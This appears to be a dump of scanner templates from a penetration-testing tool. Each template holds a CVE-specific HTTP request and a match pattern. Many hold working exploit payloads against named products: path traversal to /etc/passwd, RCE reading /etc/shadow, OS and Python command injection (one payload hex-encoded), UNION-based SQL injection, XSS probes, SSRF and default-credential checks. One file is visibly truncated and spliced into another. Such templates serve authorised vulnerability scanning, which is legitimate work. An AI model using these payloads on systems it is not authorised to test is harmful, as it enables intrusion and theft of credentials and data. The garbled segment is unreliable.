5 | SEVERITY='P3 - MEDIUM'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE="network"
--------------------------------------------------------------------------------
/templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails'
3 | URI="/../../../../../../../../etc/passwd\{\{"
4 | METHOD='GET'
5 | MATCH="root:*:"
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Palo_Alto_GlobalProtect_PAN-OS_Portal_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Palo Alto GlobalProtect PAN-OS Portal Detected'
3 | URI='/global-protect/login.esp'
4 | METHOD='GET'
5 | MATCH="<title>GlobalProtect"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 1'
3 | URI="/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
4 | METHOD='GET'
5 | MATCH="<svg/onload=alert\(1337\)>"
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-2555 - WebLogic Server Deserialization RCE'
3 | URI="/console/login/LoginForm.jsp"
4 | METHOD='GET'
5 | MATCH="WebLogic"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-3187_-_Citrix_Unauthenticated_File_Deletion.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-3187 - Citrix Unauthenticated File Deletion'
3 | URI="/+CSCOE+/session_password.html"
4 | METHOD='GET'
5 | MATCH="webvpn"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s --insecure -I "
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Laraval_Environment_File_Found.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Laraval Environment File Found'
3 | URI='/.env'
4 | METHOD='GET'
5 | MATCH="DB_PASSWORD|REDIS_PASSWORD|MAIL_PASSWORD|AWS_SECRET|PUSHER_APP_|MIX_PUSHER_APP_"
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Telerik_File_Upload_Web_UI.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Telerik File Upload Web UI'
3 | URI='/Telerik.Web.UI.WebResource.axd?type=rau'
4 | METHOD='GET'
5 | MATCH="RadAsyncUpload\ handler\ is\ registered\ succesfully"
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Weak_Authentication_Scanner.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Weak Authentication'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH='realm\='
6 | SEVERITY='P4 - LOW'
7 | CURL_OPTS="-I -L --user-agent '' -s --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
10 |
11 | if [[ "$SSL" == "false" ]]; then
12 | SEVERITY='P2 - HIGH'
13 | fi
--------------------------------------------------------------------------------
/templates/active/Wordpress_WP-File-Manager_Version_Detected.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Wordpress WP-File-Manager Version Detected'
3 | URI="/wp-content/plugins/wp-file-manager/readme.txt"
4 | METHOD='GET'
5 | MATCH="Stable\ tag\:"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/network/Default_Credentials_BruteX.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Default Credentials - BruteX'
3 | FILENAME="$LOOT_DIR/credentials/brutex-$TARGET.txt $LOOT_DIR/credentials/brutex-$TARGET-*.txt"
4 | MATCH="password\:\ "
5 | SEVERITY='P1 - CRITICAL'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | TYPE="network"
--------------------------------------------------------------------------------
/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure'
3 | URI="/cgi-bin/config.exp"
4 | METHOD='GET'
5 | MATCH="sysconfig"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 3'
3 | URI="/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
4 | METHOD='GET'
5 | MATCH="<svg/onload=alert\(1337\)>"
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-11581 - Jira Template Injection'
3 | URI='/secure/ContactAdministrators!default.jspa'
4 | METHOD='GET'
5 | MATCH='Contact Site Administrators'
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-2096 - Jenkins Gitlab Hook XSS'
3 | URI="/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
4 | METHOD='GET'
5 | MATCH="<svg/onload=alert\(1337\)>"
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 2'
3 | URI="/jenkins/git/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
4 | METHOD='GET'
5 | MATCH="<svg/onload=alert\(1337\)>"
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 4'
3 | URI="/jenkins/gitlab/build_now/a'\">%3Csvg/onload=alert(1337)%3E"
4 | METHOD='GET'
5 | MATCH="<svg/onload=alert\(1337\)>"
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-7473 Citrix ShareFile StorageZones Unauthenticated Access'
3 | URI="/UploadTest.aspx"
4 | METHOD='GET'
5 | MATCH="content\-length\:\ 0"
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS='-L -I --user-agent '' -s --insecure'
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8163_-_Rails_5.0.1_Remote_Code_Execution.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-8163 - Rails < 5.0.1 Remote Code Execution'
3 | URI='/?system(%27echo+$((1%2B1787568))%27)%3ba%23'
4 | METHOD='GET'
5 | MATCH="1787569"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/web/Insecure_SSL_TLS_Connection_CN_Mismatch.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Insecure SSL TLS Connection CN Mismatch'
3 | FILENAME="$LOOT_DIR/web/curldebug-$TARGET.txt"
4 | MATCH='failed to verify the legitimacy of the server'
5 | SEVERITY='P3 - MEDIUM'
6 | GREP_OPTIONS='-i'
7 | SEARCH='positive'
8 | SECONDARY_COMMANDS=''
9 | URI="/"
10 |
--------------------------------------------------------------------------------
/templates/active/CVE-2020-2034_-_PAN-OS_GlobalProtect_OS_Command_Injection.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-2034 - PAN-OS GlobalProtect OS Command Injection'
3 | URI='/global-protect/login.esp'
4 | METHOD='GET'
5 | MATCH='ETag|Last-Modified'
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS=''
--------------------------------------------------------------------------------
/templates/active/CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-9054 - ZyXEL NAS Remote Code Execution'
3 | URI="/cgi-bin/weblogin.cgi?username=admin';echo \$((1+1787568))"
4 | METHOD='GET'
5 | MATCH="1787569"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 2'
3 | URI="/webadmin/out"
4 | METHOD='GET'
5 | MATCH="nonexistent"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS=' --user-agent '' -s -L --insecure'
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-17519 - Apache Flink Path Traversal'
3 | URI="/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd"
4 | METHOD='GET'
5 | MATCH="root:*:"
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-24223 - Mara CMS 7.5 Reflective XSS'
3 | URI='/contact.php?theme=%3Csvg/onload=alert(1337)%3E'
4 | METHOD='GET'
5 | MATCH="<svg/onload=alert\(1337\)>"
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-5284 - Next JS Limited Path Traversal'
3 | URI="/_next/static/../server/pages-manifest.json"
4 | METHOD='GET'
5 | MATCH='\{\"/_app\":\".*?_app\.js\"'
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-25213_-_WP_File_Manager_File_Upload.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-25213 - WP File Manager File Upload'
3 | URI="/wp-content/plugins/wp-file-manager/readme.txt"
4 | METHOD='GET'
5 | MATCH="(Stable\stag\:\s[0-6]\.[0-8])"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s --insecure -I "
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5902_-_F5_BIG-IP_XSS.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-5902 - F5 BIG-IP XSS'
3 | URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=%3Csvg/onload=alert(1337)%3E'
4 | METHOD='GET'
5 | MATCH="<svg/onload=alert\(1337\)>"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF'
3 | URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
4 | METHOD='GET'
5 | MATCH="root:*:"
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-12271 - Sophos XG Firewall Pre-Auth SQL Injection'
3 | URI='/userportal/webpages/myaccount/login.jsp'
4 | METHOD='GET'
5 | MATCH='loginstylesheet'
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8209_-_Citrix_XenMobile_Server_Path_Traversal.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-8209 - Citrix XenMobile Server Path Traversal'
3 | URI="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
4 | METHOD='GET'
5 | MATCH="root:*:"
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8512_-_IceWarp_WebMail_XSS.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-8512 - IceWarp WebMail XSS'
3 | URI="/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"
4 | METHOD='GET'
5 | MATCH="<svg\/onload\=alert\(document\.domain\)>"
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Contact_Form_7_Wordpress_Plugin_Found_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Contact Form 7 Wordpress Plugin Found 1'
3 | URI="/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt"
4 | METHOD='GET'
5 | MATCH="Contact\ Form\ 7"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2019-8451_Jira_SSRF_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-8451 Jira SSRF 1'
3 | URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
4 | METHOD='GET'
5 | MATCH='<title>Google'
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-15129_-_Open_Redirect_In_Traefik.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-15129 - Open Redirect In Traefik'
3 | URI='/'
4 | METHOD='GET'
5 | MATCH="Found"
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'X-Forwarded-Prefix: https://google.com'"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability'
3 | URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/'
4 | METHOD='GET'
5 | MATCH="phpinfo\(\)"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2019-8451_Jira_SSRF_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-8451 Jira SSRF 2'
3 | URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
4 | METHOD='GET'
5 | MATCH='<title>Google'
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2019-8451_Jira_SSRF_3.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-8451 Jira SSRF 3'
3 | URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
4 | METHOD='GET'
5 | MATCH='Google'
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5412_-_Full-read_SSRF_in_Spring_Cloud_Netflix.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix'
3 | URI="/proxy.stream?origin=http://burpcollaborator.net/"
4 | METHOD='GET'
5 | MATCH="Burp\ Collaborator\ Server"
6 | SEVERITY='P3 - MEDIUM'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2'
3 | URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
4 | METHOD='GET'
5 | MATCH="root:*:"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/Contact_Form_7_Wordpress_Plugin_Found_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='Contact Form 7 Wordpress Plugin Found 2'
3 | URI="/wordpress/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt"
4 | METHOD='GET'
5 | MATCH="Contact\ Form\ 7"
6 | SEVERITY='P5 - INFO'
7 | CURL_OPTS="--user-agent '' -s --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/RabbitMQ_Management_Default_Credentials.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='RabbitMQ Management Default Credentials'
3 | URI="/api/whoami"
4 | METHOD='GET'
5 | MATCH="{\"name\":\"guest\""
6 | SEVERITY='P2 - HIGH'
7 | CURL_OPTS='-H "Content-Type: application/json" -H "Authorization: Z3Vlc3Q6Z3Vlc3Q=" --user-agent '' -s -L --insecure'
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/passive/web/Strict_Tranposrt_Security_Not_Enforced.sh:
--------------------------------------------------------------------------------
1 | if [ "$SSL" = "true" ]; then
2 | AUTHOR='@xer0dayz'
3 | VULN_NAME='Strict Tranposrt Security Not Enforced'
4 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET.txt"
5 | MATCH="strict-transport-security"
6 | SEVERITY='P4 - LOW'
7 | GREP_OPTIONS='-i'
8 | SEARCH='negative'
9 | SECONDARY_COMMANDS=''
10 | else
11 | break
12 | fi
--------------------------------------------------------------------------------
/templates/active/CVE-2019-11580_-_Atlassian_Crowd_Data_Center_Unauthenticated_RCE.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE'
3 | URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow'
4 | METHOD='GET'
5 | MATCH="root:*:"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure"
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS'
3 | URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E"
4 | METHOD='GET'
5 | MATCH="' % url)
10 | if '' in response.text:
11 | print("Vulnerable!")
12 | print(response.text)
13 | webdriver.quit()
14 | SECONDARY_COMMANDS=''
15 |
--------------------------------------------------------------------------------
/templates/active/CVE-2019-19719_Tableau_Server_DOM_XSS.py:
--------------------------------------------------------------------------------
1 | # Import any WebDriver class that you would usually import from
2 | # selenium.webdriver from the seleniumrequests module
3 | import sys
4 | from seleniumrequests import Firefox
5 |
6 | url = sys.argv[1]
7 | # Simple usage with built-in WebDrivers:
8 | webdriver = Firefox()
9 | response = webdriver.request('GET', '%s/en/embeddedAuthRedirect.html?auth=javascript:document.write(1+1336)' % url)
10 | if '1337' in response.text:
11 | print("Vulnerable!")
12 | print(response.text)
13 | webdriver.quit()
14 | SECONDARY_COMMANDS=''
--------------------------------------------------------------------------------
/templates/passive/web/Server_Header_Disclosure.sh:
--------------------------------------------------------------------------------
1 | if [ "$SSL" = "false" ]; then
2 | AUTHOR='@xer0dayz'
3 | VULN_NAME='Server Header Disclosure - HTTP'
4 | FILENAME="$LOOT_DIR/web/headers-http-$TARGET-*.txt"
5 | MATCH="Server\:"
6 | SEVERITY='P5 - INFO'
7 | GREP_OPTIONS='-i'
8 | SEARCH='positive'
9 | SECONDARY_COMMANDS=''
10 | else
11 | AUTHOR='@xer0dayz'
12 | VULN_NAME='Server Header Disclosure - HTTPS'
13 | FILENAME="$LOOT_DIR/web/headers-https-$TARGET-*.txt"
14 | MATCH="Server\:"
15 | SEVERITY='P5 - INFO'
16 | GREP_OPTIONS='-i'
17 | SEARCH='positive'
18 | SECONDARY_COMMANDS=''
19 | fi
--------------------------------------------------------------------------------
/templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 1'
3 | URI="/ajax/api/content_infraction/getIndexableContent"
4 | METHOD='POST'
5 | MATCH="6162636D31|database\ error"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_2.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-12720 - vBulletin Unauthenticaed SQLi 2'
3 | URI="/vb5/ajax/api/content_infraction/getIndexableContent"
4 | METHOD='POST'
5 | MATCH="6162636D31|database\ error"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: "XMLHttpRequest"' --data \"nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,HEX('abcm1'),8,7,6,5,4,3,2,1+from+user+where+userid=1--\" "
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/.github/workflows/semgrep.yml:
--------------------------------------------------------------------------------
1 | on:
2 | workflow_dispatch: {}
3 | pull_request: {}
4 | push:
5 | branches:
6 | - main
7 | - master
8 | paths:
9 | - .github/workflows/semgrep.yml
10 | schedule:
11 | # random HH:MM to avoid a load spike on GitHub Actions at 00:00
12 | - cron: 2 23 * * *
13 | name: Semgrep
14 | jobs:
15 | semgrep:
16 | name: semgrep/ci
17 | runs-on: ubuntu-20.04
18 | env:
19 | SEMGREP_APP_TOKEN: ${{ secrets.SEMGREP_APP_TOKEN }}
20 | container:
21 | image: returntocorp/semgrep
22 | steps:
23 | - uses: actions/checkout@v3
24 | - run: semgrep ci
25 |
--------------------------------------------------------------------------------
/templates/active/CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_1.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-13167 - Netsweeper WebAdmin unixlogin.php Python Code Injection 1'
3 | URI="/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
4 | METHOD='GET'
5 | MATCH="nonexistent"
6 | SEVERITY='P1 - CRITICAL'
7 | CURL_OPTS=' --user-agent '' -s -L --insecure'
8 | SECONDARY_COMMANDS=''
9 | GREP_OPTIONS='-i'
--------------------------------------------------------------------------------
/templates/active/CVE-2020-8193_-_Citrix_Unauthenticated_LFI.sh:
--------------------------------------------------------------------------------
1 | AUTHOR='@xer0dayz'
2 | VULN_NAME='CVE-2020-8193 - Citrix Unauthenticated LFI'
